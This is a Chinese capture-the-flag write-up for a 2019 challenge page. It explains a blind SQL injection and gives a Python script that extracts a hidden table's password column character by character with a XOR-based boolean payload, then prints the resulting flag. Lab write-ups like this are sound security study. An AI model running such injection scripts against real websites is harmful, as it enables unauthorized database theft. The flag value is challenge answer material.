[极客大挑战 2019]FinalSQL1

打开题目

sql注入,点击1试一下

点击2试一下

点击3试一下

点击4

点击5

id=6试一下

感觉是sql盲注了

编写脚本

import requests

import string

from time import sleep

url = "http://9da9cb18-3096-413a-9476-8a177ffec31a.node4.buuoj.cn:81/search.php?id=0\^({})"

如果为真时的关键字匹配

base = 'Click others'

盲注的字符集

chars = string.printable

inject = "ord(substr(reverse((SELECT(GROUP_CONCAT(password))FROM(geek.F1naI1y))),{},1))={}"

for i in range(1, 1000):

continue_ = False

for c in chars:

u = url.format(inject.format(i,ord(c)))

res = requests.get(u)

while res.status_code == 429:

sleep(1)

res = requests.get(u)

if base in res.text:

print(c,end='',flush=True)

continue_ = True

break

if not continue_:

break(参考博客)

得到flag倒序,更正为

得到flag

flag{87c0b617-4e80-4135-b08c-ad013c856e27}

相关推荐
Bulestar_xx7 小时前
20250711_Sudo 靶机复盘
linux·安全·web安全
Kay_Liang10 小时前
MySQL SQL语句精要:DDL、DML与DCL的深度探究
开发语言·数据库·sql·mysql·database
float_六七12 小时前
SQL预编译:安全高效数据库操作的关键
数据库·sql·安全
写代码也要符合基本法13 小时前
Oracle SQL - 使用行转列PIVOT减少表重复扫描(实例)
数据库·sql·oracle
写不出来就跑路18 小时前
openGauss数据库管理实战指南——基本常用操作总结
数据库·sql·gaussdb
The_cute_cat19 小时前
SQL的初步学习(二)(以MySQL为例)
sql·学习·mysql
Fanmeang21 小时前
2025江苏省信息安全管理与评估赛项二三阶段任务书
安全·web安全·信息安全管理与评估·神州数码·全国职业院校技能大赛·二三阶段
~ 小团子2 天前
每日一SQL 【各赛事的用户注册率】
数据库·sql
小袁拒绝摆烂2 天前
SQL开窗函数
android·sql·性能优化
~ 小团子2 天前
每日一SQL 【每月交易 I】
数据库·sql